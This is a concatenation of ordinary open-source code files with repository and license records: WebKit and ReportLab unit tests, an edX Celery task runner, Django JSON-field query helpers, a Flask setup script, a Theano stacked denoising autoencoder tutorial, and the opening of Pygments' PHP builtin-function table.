LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from webkitpy.tool.commands.commandtest import CommandsTest from webkitpy.tool.commands.suggestnominations import SuggestNominations from webkitpy.tool.mocktool import MockOptions, MockTool class SuggestNominationsTest(CommandsTest): mock_git_output = """commit 60831dde5beb22f35aef305a87fca7b5f284c698 Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc> Date: 2011-09-15 19:56:21 +0000 Value profiles collect no information for global variables https://bugs.webkit.org/show_bug.cgi?id=68143 Reviewed by Geoffrey Garen. git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc """ mock_same_author_commit_message = """Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc> Date: 2011-09-15 19:56:21 +0000 Value profiles collect no information for global variables https://bugs.webkit.org/show_bug.cgi?id=68143 Reviewed by Geoffrey Garen. git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc """ def _make_options(self, **kwargs): defaults = { 'committer_minimum': 10, 'max_commit_age': 9, 'reviewer_minimum': 80, 'show_commits': False, 'verbose': False, } options = MockOptions(**defaults) options.update(**kwargs) return options def test_recent_commit_messages(self): tool = MockTool() suggest_nominations = SuggestNominations() suggest_nominations._init_options(options=self._make_options()) suggest_nominations.bind_to_tool(tool) tool.executive.run_command = lambda command: self.mock_git_output self.assertEqual(list(suggest_nominations._recent_commit_messages()), [self.mock_same_author_commit_message]) mock_non_committer_commit_message = """ Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc> Date: 2009-09-15 14:08:42 +0000 Let TestWebKitAPI work for chromium https://bugs.webkit.org/show_bug.cgi?id=67756 Patch by Xianzhu Wang <[email protected]> on 2011-09-15 Reviewed by Sam Weinig. 
Source/WebKit/chromium: * WebKit.gyp: git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95188 268f45cc-cd09-0410-ab3c-d52691b4dbfc """ def test_basic(self): expected_stdout = "REVIEWER: Xianzhu Wang ([email protected]) has 88 reviewed patches\n" options = self._make_options() suggest_nominations = SuggestNominations() suggest_nominations._init_options(options=options) suggest_nominations._recent_commit_messages = lambda: [self.mock_non_committer_commit_message for _ in range(88)] self.assert_execute_outputs(suggest_nominations, [], expected_stdout=expected_stdout, options=options)
bsd-3-clause
paran0ids0ul/infernal-twin
build/reportlab/tests/test_widgetbase_tpc.py
15
2997
#Copyright ReportLab Europe Ltd. 2000-2012 #see license.txt for license details """ Tests for TypedPropertyCollection class. """ __version__='''$Id$''' from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, printLocation setOutDir(__name__) import os, sys, copy from os.path import join, basename, splitext import unittest from reportlab.graphics.widgetbase import PropHolder, TypedPropertyCollection from reportlab.lib.attrmap import AttrMap, AttrMapValue from reportlab.lib.validators import isNumber TPC = TypedPropertyCollection class PH(PropHolder): _attrMap = AttrMap( a = AttrMapValue(isNumber), b = AttrMapValue(isNumber) ) class APH(PH): def __init__(self): self.a = 1 class BPH(APH): def __init__(self): APH.__init__(self) def __getattr__(self,name): if name=='b': return -1 raise AttributeError class TPCTestCase(unittest.TestCase): "Test TypedPropertyCollection class." def test0(self): "Test setting an invalid collective attribute." t = TPC(PH) try: t.c = 42 except AttributeError: pass def test1(self): "Test setting a valid collective attribute." t = TPC(PH) t.a = 42 assert t.a == 42 def test2(self): "Test setting a valid collective attribute with an invalid value." t = TPC(PH) try: t.a = 'fourty-two' except AttributeError: pass def test3(self): "Test setting a valid collective attribute with a convertible invalid value." t = TPC(PH) t.a = '42' assert t.a == '42' # Or should it rather be an integer? def test4(self): "Test accessing an unset collective attribute." t = TPC(PH) try: t.a except AttributeError: pass def test5(self): "Test overwriting a collective attribute in one slot." t = TPC(PH) t.a = 42 t[0].a = 4242 assert t[0].a == 4242 def test6(self): "Test overwriting a one slot attribute with a collective one." t = TPC(PH) t[0].a = 4242 t.a = 42 assert t[0].a == 4242 def test7(self): "Test to ensure we can handle classes with __getattr__ methods" a=TypedPropertyCollection(APH) b=TypedPropertyCollection(BPH) a.a=3 b.a=4 try: a.b assert 1, "Shouldn't be able to see a.b" except AttributeError: pass a.b=0 assert a.b==0, "Wrong value for "+str(a.b) assert b.b==-1, "This should call __getattr__ special" b.b=0 assert a[0].b==0 assert b[0].b==-1, "Class __getattr__ should return -1" def makeSuite(): return makeSuiteForClasses(TPCTestCase) #noruntests if __name__ == "__main__": unittest.TextTestRunner().run(makeSuite()) printLocation()
gpl-3.0
ahmedaljazzar/edx-platform
lms/djangoapps/instructor_task/tasks_helper/runner.py
16
5153
import json import logging from time import time from celery import current_task from django.db import reset_queries import dogstats_wrapper as dog_stats_api from lms.djangoapps.instructor_task.models import PROGRESS, InstructorTask from util.db import outer_atomic TASK_LOG = logging.getLogger('edx.celery.task') class TaskProgress(object): """ Encapsulates the current task's progress by keeping track of 'attempted', 'succeeded', 'skipped', 'failed', 'total', 'action_name', and 'duration_ms' values. """ def __init__(self, action_name, total, start_time): self.action_name = action_name self.total = total self.start_time = start_time self.attempted = 0 self.succeeded = 0 self.skipped = 0 self.failed = 0 self.preassigned = 0 def update_task_state(self, extra_meta=None): """ Update the current celery task's state to the progress state specified by the current object. Returns the progress dictionary for use by `run_main_task` and `BaseInstructorTask.on_success`. Arguments: extra_meta (dict): Extra metadata to pass to `update_state` Returns: dict: The current task's progress dict """ progress_dict = { 'action_name': self.action_name, 'attempted': self.attempted, 'succeeded': self.succeeded, 'skipped': self.skipped, 'failed': self.failed, 'total': self.total, 'preassigned': self.preassigned, 'duration_ms': int((time() - self.start_time) * 1000), } if extra_meta is not None: progress_dict.update(extra_meta) _get_current_task().update_state(state=PROGRESS, meta=progress_dict) return progress_dict def run_main_task(entry_id, task_fcn, action_name): """ Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask. Arguments passed to `task_fcn` are: `entry_id` : the primary key for the InstructorTask entry representing the task. `course_id` : the id for the course. `task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input. `action_name` : past-tense verb to use for constructing status messages. If no exceptions are raised, the `task_fcn` should return a dict containing the task's result with the following keys: 'attempted': number of attempts made 'succeeded': number of attempts that "succeeded" 'skipped': number of attempts that "skipped" 'failed': number of attempts that "failed" 'total': number of possible subtasks to attempt 'action_name': user-visible verb to use in status messages. Should be past-tense. Pass-through of input `action_name`. 'duration_ms': how long the task has (or had) been running. """ # Get the InstructorTask to be updated. If this fails then let the exception return to Celery. # There's no point in catching it here. with outer_atomic(): entry = InstructorTask.objects.get(pk=entry_id) entry.task_state = PROGRESS entry.save_now() # Get inputs to use in this task from the entry task_id = entry.task_id course_id = entry.course_id task_input = json.loads(entry.task_input) # Construct log message fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}' task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input) TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name) # Check that the task_id submitted in the InstructorTask matches the current task # that is running. 
request_task_id = _get_current_task().request.id if task_id != request_task_id: fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"' message = fmt.format(task_info=task_info_string, actual_id=request_task_id) TASK_LOG.error(message) raise ValueError(message) # Now do the work with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]): task_progress = task_fcn(entry_id, course_id, task_input, action_name) # Release any queries that the connection has been hanging onto reset_queries() # Log and exit, returning task_progress info as task result TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress) return task_progress def _get_current_task(): """ Stub to make it easier to test without actually running Celery. This is a wrapper around celery.current_task, which provides access to the top of the stack of Celery's tasks. When running tests, however, it doesn't seem to work to mock current_task directly, so this wrapper is used to provide a hook to mock in tests, while providing the real `current_task` in production. """ return current_task
agpl-3.0
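The run_main_task docstring above fixes the contract for task_fcn(entry_id, course_id, task_input, action_name) and the progress keys it must report; a hedged sketch of a conforming function built on TaskProgress follows, where iter_items and process_item are hypothetical placeholders and update_task_state assumes the code runs inside a real Celery task:

# Sketch of a task_fcn matching the documented contract; the item source and the
# per-item work are hypothetical, and the import path mirrors this file's own imports.
from time import time
from lms.djangoapps.instructor_task.tasks_helper.runner import TaskProgress

def example_task_fcn(entry_id, course_id, task_input, action_name):
    items = list(iter_items(course_id, task_input))     # hypothetical item source
    progress = TaskProgress(action_name, total=len(items), start_time=time())
    for item in items:
        progress.attempted += 1
        try:
            process_item(item)                           # hypothetical per-item work
            progress.succeeded += 1
        except Exception:
            progress.failed += 1
    return progress.update_task_state()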
parksandwildlife/biosys
biosys/apps/main/utils_misc.py
4
2739
from django.db.models.expressions import RawSQL def get_value(keys, dict_, default=None): """ Given a list of keys, search in a dict for the first matching keys (case insensitive) and return the value Note: the search is case insensitive. :param keys: list of possible keys :param dict_: :param default: :return: """ keys = [k.lower() for k in keys] # lower the dict keys d_low = dict((k.lower(), v) for k, v in dict_.items()) for key in keys: if key in d_low: return d_low.get(key) return default def search_json_field(qs, json_field_name, keys, search_param): """ Search does not support searching within JSONField. :param qs: queryset :param json_field_name: json field with values within to search :param keys: list of keys in json field to search :param search_param: value to search :return: the queryset after search filters applied """ where_clauses = [] params = [] for key in keys: where_clauses.append(json_field_name + '->>%s ILIKE %s') params += [key, '%' + search_param + '%'] return qs.extra(where=['OR '.join(where_clauses)], params=params) def search_json_fields(qs, field_info, search_param): """ Search does not support searching within JSONField. :param qs: queryset :param field_info: dictionary with json_field_name as the key and each json_field's respective keys as the value :param search_param: value to search :return: the queryset after search filters applied """ where_clauses = [] params = [] for json_field_name in field_info.keys(): for key in field_info[json_field_name]: where_clauses.append(json_field_name + '->>%s ILIKE %s') params += [key, '%' + search_param + '%'] return qs.extra(where=['OR '.join(where_clauses)], params=params) def order_by_json_field(qs, json_field_name, keys, ordering_param): """ Order by does not support ordering within JSONField. :param qs: queryset :param json_field_name: json field with values within to potentially order by :param keys: list of keys in json field to potentially order by :param ordering_param: field to order by, prefixed with '-' for descending order :return: the queryset after ordering is applied if order_by param is within the json field """ for key in keys: if ordering_param == key or ordering_param == '-' + key: if ordering_param.startswith('-'): qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param[1:],)).desc()) else: qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param,))) return qs
apache-2.0
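A quick, self-contained check of get_value above; the record dict and key lists are made up for illustration, the import path is assumed from the app layout, and the JSON-field helpers are skipped here because they need a Django queryset on Postgres:

# get_value() does a case-insensitive lookup over a list of candidate keys.
from main.utils_misc import get_value   # import path assumed from biosys/apps/main

record = {'SPECIES NAME': 'Emu', 'Count': 2}
assert get_value(['species name', 'species'], record) == 'Emu'
assert get_value(['genus'], record, default='unknown') == 'unknown'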
lovette/flask_signedcookies
setup.py
1
1129
from setuptools import setup setup( name='flask_signedcookies', version='1.0.0', url='https://github.com/lovette/flask_signedcookies', download_url = 'https://github.com/lovette/flask_signedcookies/archive/master.tar.gz', license='BSD', author='Lance Lovette', author_email='[email protected]', description='Flask extension that provides easy access to signed cookies.', long_description=open('README.md').read(), py_modules=['flask_signedcookies',], install_requires=['Flask',], tests_require=['nose',], zip_safe=False, platforms='any', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Software Development :: Libraries :: Python Modules' ] )
bsd-3-clause
fegonda/icon_demo
code/external/SdA.py
4
18933
""" This tutorial introduces stacked denoising auto-encoders (SdA) using Theano. Denoising autoencoders are the building blocks for SdA. They are based on auto-encoders as the ones used in Bengio et al. 2007. An autoencoder takes an input x and first maps it to a hidden representation y = f_{\theta}(x) = s(Wx+b), parameterized by \theta={W,b}. The resulting latent representation y is then mapped back to a "reconstructed" vector z \in [0,1]^d in input space z = g_{\theta'}(y) = s(W'y + b'). The weight matrix W' can optionally be constrained such that W' = W^T, in which case the autoencoder is said to have tied weights. The network is trained such that to minimize the reconstruction error (the error between x and z). For the denosing autoencoder, during training, first x is corrupted into \tilde{x}, where \tilde{x} is a partially destroyed version of x by means of a stochastic mapping. Afterwards y is computed as before (using \tilde{x}), y = s(W\tilde{x} + b) and z as s(W'y + b'). The reconstruction error is now measured between z and the uncorrupted input x, which is computed as the cross-entropy : - \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)] References : - P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103, 2008 - Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise Training of Deep Networks, Advances in Neural Information Processing Systems 19, 2007 """ import os import sys import time import numpy import theano import theano.tensor as T from theano.tensor.shared_randomstreams import RandomStreams from logistic_sgd import LogisticRegression, load_data from mlp import HiddenLayer from dA import dA # start-snippet-1 class SdA(object): """Stacked denoising auto-encoder class (SdA) A stacked denoising autoencoder model is obtained by stacking several dAs. The hidden layer of the dA at layer `i` becomes the input of the dA at layer `i+1`. The first layer dA gets as input the input of the SdA, and the hidden layer of the last dA represents the output. Note that after pretraining, the SdA is dealt with as a normal MLP, the dAs are only used to initialize the weights. """ def __init__( self, numpy_rng, theano_rng=None, n_ins=784, hidden_layers_sizes=[500, 500], n_outs=10, corruption_levels=[0.1, 0.1] ): """ This class is made to support a variable number of layers. 
        :type numpy_rng: numpy.random.RandomState
        :param numpy_rng: numpy random number generator used to draw initial
                          weights

        :type theano_rng: theano.tensor.shared_randomstreams.RandomStreams
        :param theano_rng: Theano random generator; if None is given one is
                           generated based on a seed drawn from `rng`

        :type n_ins: int
        :param n_ins: dimension of the input to the sdA

        :type hidden_layers_sizes: list of ints
        :param hidden_layers_sizes: intermediate layers size, must contain
                                    at least one value

        :type n_outs: int
        :param n_outs: dimension of the output of the network

        :type corruption_levels: list of float
        :param corruption_levels: amount of corruption to use for each
                                  layer
        """

        self.sigmoid_layers = []
        self.dA_layers = []
        self.params = []
        self.n_layers = len(hidden_layers_sizes)

        assert self.n_layers > 0

        if not theano_rng:
            theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
        # allocate symbolic variables for the data
        self.x = T.matrix('x')  # the data is presented as rasterized images
        self.y = T.ivector('y')  # the labels are presented as 1D vector of
                                 # [int] labels
        # end-snippet-1

        # The SdA is an MLP, for which all weights of intermediate layers
        # are shared with a different denoising autoencoder
        # We will first construct the SdA as a deep multilayer perceptron,
        # and when constructing each sigmoidal layer we also construct a
        # denoising autoencoder that shares weights with that layer
        # During pretraining we will train these autoencoders (which will
        # lead to changing the weights of the MLP as well)
        # During finetuning we will finish training the SdA by doing
        # stochastic gradient descent on the MLP

        # start-snippet-2
        for i in xrange(self.n_layers):
            # construct the sigmoidal layer

            # the size of the input is either the number of hidden units of
            # the layer below or the input size if we are on the first layer
            if i == 0:
                input_size = n_ins
            else:
                input_size = hidden_layers_sizes[i - 1]

            # the input to this layer is either the activation of the hidden
            # layer below or the input of the SdA if you are on the first
            # layer
            if i == 0:
                layer_input = self.x
            else:
                layer_input = self.sigmoid_layers[-1].output

            sigmoid_layer = HiddenLayer(rng=numpy_rng,
                                        input=layer_input,
                                        n_in=input_size,
                                        n_out=hidden_layers_sizes[i],
                                        activation=T.nnet.sigmoid)
            # add the layer to our list of layers
            self.sigmoid_layers.append(sigmoid_layer)
            # it's arguably a philosophical question...
            # but we are going to only declare that the parameters of the
            # sigmoid_layers are parameters of the StackedDAA
            # the visible biases in the dA are parameters of those
            # dA, but not the SdA
            self.params.extend(sigmoid_layer.params)

            # Construct a denoising autoencoder that shares weights with this
            # layer
            dA_layer = dA(numpy_rng=numpy_rng,
                          theano_rng=theano_rng,
                          input=layer_input,
                          n_visible=input_size,
                          n_hidden=hidden_layers_sizes[i],
                          W=sigmoid_layer.W,
                          bhid=sigmoid_layer.b)
            self.dA_layers.append(dA_layer)
        # end-snippet-2
        # We now need to add a logistic layer on top of the MLP
        self.logLayer = LogisticRegression(
            input=self.sigmoid_layers[-1].output,
            n_in=hidden_layers_sizes[-1],
            n_out=n_outs
        )

        self.params.extend(self.logLayer.params)
        # construct a function that implements one step of finetuning

        # compute the cost for second phase of training,
        # defined as the negative log likelihood
        self.finetune_cost = self.logLayer.negative_log_likelihood(self.y)
        # compute the gradients with respect to the model parameters
        # symbolic variable that points to the number of errors made on the
        # minibatch given by self.x and self.y
        self.errors = self.logLayer.errors(self.y)

    def pretraining_functions(self, train_set_x, batch_size):
        ''' Generates a list of functions, each of them implementing one
        step in training the dA corresponding to the layer with same index.
        The function will require as input the minibatch index, and to train
        a dA you just need to iterate, calling the corresponding function on
        all minibatch indexes.

        :type train_set_x: theano.tensor.TensorType
        :param train_set_x: Shared variable that contains all datapoints used
                            for training the dA

        :type batch_size: int
        :param batch_size: size of a [mini]batch

        :type learning_rate: float
        :param learning_rate: learning rate used during training for any of
                              the dA layers
        '''

        # index to a [mini]batch
        index = T.lscalar('index')  # index to a minibatch
        corruption_level = T.scalar('corruption')  # % of corruption to use
        learning_rate = T.scalar('lr')  # learning rate to use
        # beginning of a batch, given `index`
        batch_begin = index * batch_size
        # ending of a batch given `index`
        batch_end = batch_begin + batch_size

        pretrain_fns = []
        for dA in self.dA_layers:
            # get the cost and the updates list
            cost, updates = dA.get_cost_updates(corruption_level,
                                                learning_rate)
            # compile the theano function
            fn = theano.function(
                inputs=[
                    index,
                    theano.Param(corruption_level, default=0.2),
                    theano.Param(learning_rate, default=0.1)
                ],
                outputs=cost,
                updates=updates,
                givens={
                    self.x: train_set_x[batch_begin: batch_end]
                }
            )
            # append `fn` to the list of functions
            pretrain_fns.append(fn)

        return pretrain_fns

    def build_finetune_functions(self, datasets, batch_size, learning_rate):
        '''Generates a function `train` that implements one step of
        finetuning, a function `validate` that computes the error on
        a batch from the validation set, and a function `test` that
        computes the error on a batch from the testing set

        :type datasets: list of pairs of theano.tensor.TensorType
        :param datasets: It is a list that contains all the datasets;
                         it has to contain three pairs, `train`,
                         `valid`, `test` in this order, where each pair
                         is formed of two Theano variables, one for the
                         datapoints, the other for the labels

        :type batch_size: int
        :param batch_size: size of a minibatch

        :type learning_rate: float
        :param learning_rate: learning rate used during finetune stage
        '''

        (train_set_x, train_set_y) = datasets[0]
        (valid_set_x, valid_set_y) = datasets[1]
        (test_set_x, test_set_y) = datasets[2]

        # compute number of minibatches for training, validation and testing
        n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]
        n_valid_batches /= batch_size
        n_test_batches = test_set_x.get_value(borrow=True).shape[0]
        n_test_batches /= batch_size

        index = T.lscalar('index')  # index to a [mini]batch

        # compute the gradients with respect to the model parameters
        gparams = T.grad(self.finetune_cost, self.params)

        # compute list of fine-tuning updates
        updates = [
            (param, param - gparam * learning_rate)
            for param, gparam in zip(self.params, gparams)
        ]

        train_fn = theano.function(
            inputs=[index],
            outputs=self.finetune_cost,
            updates=updates,
            givens={
                self.x: train_set_x[
                    index * batch_size: (index + 1) * batch_size
                ],
                self.y: train_set_y[
                    index * batch_size: (index + 1) * batch_size
                ]
            },
            name='train'
        )

        test_score_i = theano.function(
            [index],
            self.errors,
            givens={
                self.x: test_set_x[
                    index * batch_size: (index + 1) * batch_size
                ],
                self.y: test_set_y[
                    index * batch_size: (index + 1) * batch_size
                ]
            },
            name='test'
        )

        valid_score_i = theano.function(
            [index],
            self.errors,
            givens={
                self.x: valid_set_x[
                    index * batch_size: (index + 1) * batch_size
                ],
                self.y: valid_set_y[
                    index * batch_size: (index + 1) * batch_size
                ]
            },
            name='valid'
        )

        # Create a function that scans the entire validation set
        def valid_score():
            return [valid_score_i(i) for i in xrange(n_valid_batches)]

        # Create a function that scans the entire test set
        def test_score():
            return [test_score_i(i) for i in xrange(n_test_batches)]

        return train_fn, valid_score, test_score


def test_SdA(finetune_lr=0.1, pretraining_epochs=15,
             pretrain_lr=0.001, training_epochs=1000,
             dataset='mnist.pkl.gz', batch_size=1):
    """
    Demonstrates how to train and test a stacked denoising autoencoder.

    This is demonstrated on MNIST.

    :type finetune_lr: float
    :param finetune_lr: learning rate used in the finetune stage
    (factor for the stochastic gradient)

    :type pretraining_epochs: int
    :param pretraining_epochs: number of epochs to do pretraining

    :type pretrain_lr: float
    :param pretrain_lr: learning rate to be used during pre-training

    :type training_epochs: int
    :param training_epochs: maximal number of iterations to run the optimizer

    :type dataset: string
    :param dataset: path to the pickled dataset

    """

    datasets = load_data(dataset)

    train_set_x, train_set_y = datasets[0]
    valid_set_x, valid_set_y = datasets[1]
    test_set_x, test_set_y = datasets[2]

    # compute number of minibatches for training, validation and testing
    n_train_batches = train_set_x.get_value(borrow=True).shape[0]
    n_train_batches /= batch_size

    # numpy random generator
    # start-snippet-3
    numpy_rng = numpy.random.RandomState(89677)
    print '... building the model'
    # construct the stacked denoising autoencoder class
    sda = SdA(
        numpy_rng=numpy_rng,
        n_ins=28 * 28,
        hidden_layers_sizes=[1000, 1000, 1000],
        n_outs=10
    )
    # end-snippet-3 start-snippet-4
    #########################
    # PRETRAINING THE MODEL #
    #########################
    print '... getting the pretraining functions'
    pretraining_fns = sda.pretraining_functions(train_set_x=train_set_x,
                                                batch_size=batch_size)

    print '... pre-training the model'
    start_time = time.clock()
    ## Pre-train layer-wise
    corruption_levels = [.1, .2, .3]
    for i in xrange(sda.n_layers):
        # go through pretraining epochs
        for epoch in xrange(pretraining_epochs):
            # go through the training set
            c = []
            for batch_index in xrange(n_train_batches):
                c.append(pretraining_fns[i](index=batch_index,
                         corruption=corruption_levels[i],
                         lr=pretrain_lr))
            print 'Pre-training layer %i, epoch %d, cost ' % (i, epoch),
            print numpy.mean(c)

    end_time = time.clock()

    print >> sys.stderr, ('The pretraining code for file ' +
                          os.path.split(__file__)[1] +
                          ' ran for %.2fm' % ((end_time - start_time) / 60.))
    # end-snippet-4
    ########################
    # FINETUNING THE MODEL #
    ########################

    # get the training, validation and testing function for the model
    print '... getting the finetuning functions'
    train_fn, validate_model, test_model = sda.build_finetune_functions(
        datasets=datasets,
        batch_size=batch_size,
        learning_rate=finetune_lr
    )

    print '... finetuning the model'
    # early-stopping parameters
    patience = 10 * n_train_batches  # look at this many examples regardless
    patience_increase = 2.  # wait this much longer when a new best is
                            # found
    improvement_threshold = 0.995  # a relative improvement of this much is
                                   # considered significant
    validation_frequency = min(n_train_batches, patience / 2)
                                  # go through this many
                                  # minibatches before checking the network
                                  # on the validation set; in this case we
                                  # check every epoch

    best_validation_loss = numpy.inf
    best_iter = 0
    test_score = 0.
    start_time = time.clock()

    done_looping = False
    epoch = 0

    while (epoch < training_epochs) and (not done_looping):
        epoch = epoch + 1
        for minibatch_index in xrange(n_train_batches):
            minibatch_avg_cost = train_fn(minibatch_index)
            iter = (epoch - 1) * n_train_batches + minibatch_index

            if (iter + 1) % validation_frequency == 0:
                validation_losses = validate_model()
                this_validation_loss = numpy.mean(validation_losses)
                print('epoch %i, minibatch %i/%i, validation error %f %%' %
                      (epoch, minibatch_index + 1, n_train_batches,
                       this_validation_loss * 100.))

                # if we got the best validation score until now
                if this_validation_loss < best_validation_loss:

                    # improve patience if loss improvement is good enough
                    if (
                        this_validation_loss < best_validation_loss *
                        improvement_threshold
                    ):
                        patience = max(patience, iter * patience_increase)

                    # save best validation score and iteration number
                    best_validation_loss = this_validation_loss
                    best_iter = iter

                    # test it on the test set
                    test_losses = test_model()
                    test_score = numpy.mean(test_losses)
                    print(('     epoch %i, minibatch %i/%i, test error of '
                           'best model %f %%') %
                          (epoch, minibatch_index + 1, n_train_batches,
                           test_score * 100.))

            if patience <= iter:
                done_looping = True
                break

    end_time = time.clock()
    print(
        (
            'Optimization complete with best validation score of %f %%, '
            'on iteration %i, '
            'with test performance %f %%'
        )
        % (best_validation_loss * 100., best_iter + 1, test_score * 100.)
    )
    print >> sys.stderr, ('The training code for file ' +
                          os.path.split(__file__)[1] +
                          ' ran for %.2fm' % ((end_time - start_time) / 60.))


if __name__ == '__main__':
    test_SdA()
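
# ---------------------------------------------------------------------------
# Editor's usage sketch (added; not part of the original tutorial file).
# After pre-training and fine-tuning, the stacked sigmoid layers plus the
# logistic layer already form an ordinary MLP, so a classification function
# can be compiled straight from the symbolic graph built in SdA.__init__.
# The helper below is hypothetical: it assumes `sda` is a trained SdA
# instance and that `logLayer.y_pred` (the argmax over class probabilities)
# is provided by the LogisticRegression class used in these tutorials.
def predict_sda(sda, data_x):
    """Return predicted labels for a 2D numpy array of rasterized images."""
    predict_model = theano.function(
        inputs=[sda.x],
        outputs=sda.logLayer.y_pred
    )
    return predict_model(data_x)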
mit
sebfung/yellowpillowcase
vendor/cache/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/lexers/_phpbuiltins.py
47
154371
# -*- coding: utf-8 -*- """ pygments.lexers._phpbuiltins ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This file loads the function names and their modules from the php webpage and generates itself. Do not alter the MODULES dict by hand! WARNING: the generation transfers quite much data over your internet connection. don't run that at home, use a server ;-) :copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ from __future__ import print_function MODULES = {'.NET': ['dotnet_load'], 'APC': ['apc_add', 'apc_bin_dump', 'apc_bin_dumpfile', 'apc_bin_load', 'apc_bin_loadfile', 'apc_cache_info', 'apc_cas', 'apc_clear_cache', 'apc_compile_file', 'apc_dec', 'apc_define_constants', 'apc_delete_file', 'apc_delete', 'apc_exists', 'apc_fetch', 'apc_inc', 'apc_load_constants', 'apc_sma_info', 'apc_store'], 'APD': ['apd_breakpoint', 'apd_callstack', 'apd_clunk', 'apd_continue', 'apd_croak', 'apd_dump_function_table', 'apd_dump_persistent_resources', 'apd_dump_regular_resources', 'apd_echo', 'apd_get_active_symbols', 'apd_set_pprof_trace', 'apd_set_session_trace_socket', 'apd_set_session_trace', 'apd_set_session', 'override_function', 'rename_function'], 'Aliases and deprecated Mysqli': ['mysqli_bind_param', 'mysqli_bind_result', 'mysqli_client_encoding', 'mysqli_connect', 'mysqli_disable_rpl_parse', 'mysqli_enable_reads_from_master', 'mysqli_enable_rpl_parse', 'mysqli_escape_string', 'mysqli_execute', 'mysqli_fetch', 'mysqli_get_cache_stats', 'mysqli_get_metadata', 'mysqli_master_query', 'mysqli_param_count', 'mysqli_report', 'mysqli_rpl_parse_enabled', 'mysqli_rpl_probe', 'mysqli_send_long_data', 'mysqli_slave_query'], 'Apache': ['apache_child_terminate', 'apache_get_modules', 'apache_get_version', 'apache_getenv', 'apache_lookup_uri', 'apache_note', 'apache_request_headers', 'apache_reset_timeout', 'apache_response_headers', 'apache_setenv', 'getallheaders', 'virtual'], 'Array': ['array_change_key_case', 'array_chunk', 'array_column', 'array_combine', 'array_count_values', 'array_diff_assoc', 'array_diff_key', 'array_diff_uassoc', 'array_diff_ukey', 'array_diff', 'array_fill_keys', 'array_fill', 'array_filter', 'array_flip', 'array_intersect_assoc', 'array_intersect_key', 'array_intersect_uassoc', 'array_intersect_ukey', 'array_intersect', 'array_key_exists', 'array_keys', 'array_map', 'array_merge_recursive', 'array_merge', 'array_multisort', 'array_pad', 'array_pop', 'array_product', 'array_push', 'array_rand', 'array_reduce', 'array_replace_recursive', 'array_replace', 'array_reverse', 'array_search', 'array_shift', 'array_slice', 'array_splice', 'array_sum', 'array_udiff_assoc', 'array_udiff_uassoc', 'array_udiff', 'array_uintersect_assoc', 'array_uintersect_uassoc', 'array_uintersect', 'array_unique', 'array_unshift', 'array_values', 'array_walk_recursive', 'array_walk', 'array', 'arsort', 'asort', 'compact', 'count', 'current', 'each', 'end', 'extract', 'in_array', 'key_exists', 'key', 'krsort', 'ksort', 'list', 'natcasesort', 'natsort', 'next', 'pos', 'prev', 'range', 'reset', 'rsort', 'shuffle', 'sizeof', 'sort', 'uasort', 'uksort', 'usort'], 'BBCode': ['bbcode_add_element', 'bbcode_add_smiley', 'bbcode_create', 'bbcode_destroy', 'bbcode_parse', 'bbcode_set_arg_parser', 'bbcode_set_flags'], 'BC Math': ['bcadd', 'bccomp', 'bcdiv', 'bcmod', 'bcmul', 'bcpow', 'bcpowmod', 'bcscale', 'bcsqrt', 'bcsub'], 'Blenc': ['blenc_encrypt'], 'Bzip2': ['bzclose', 'bzcompress', 'bzdecompress', 'bzerrno', 'bzerror', 'bzerrstr', 'bzflush', 'bzopen', 'bzread', 'bzwrite'], 
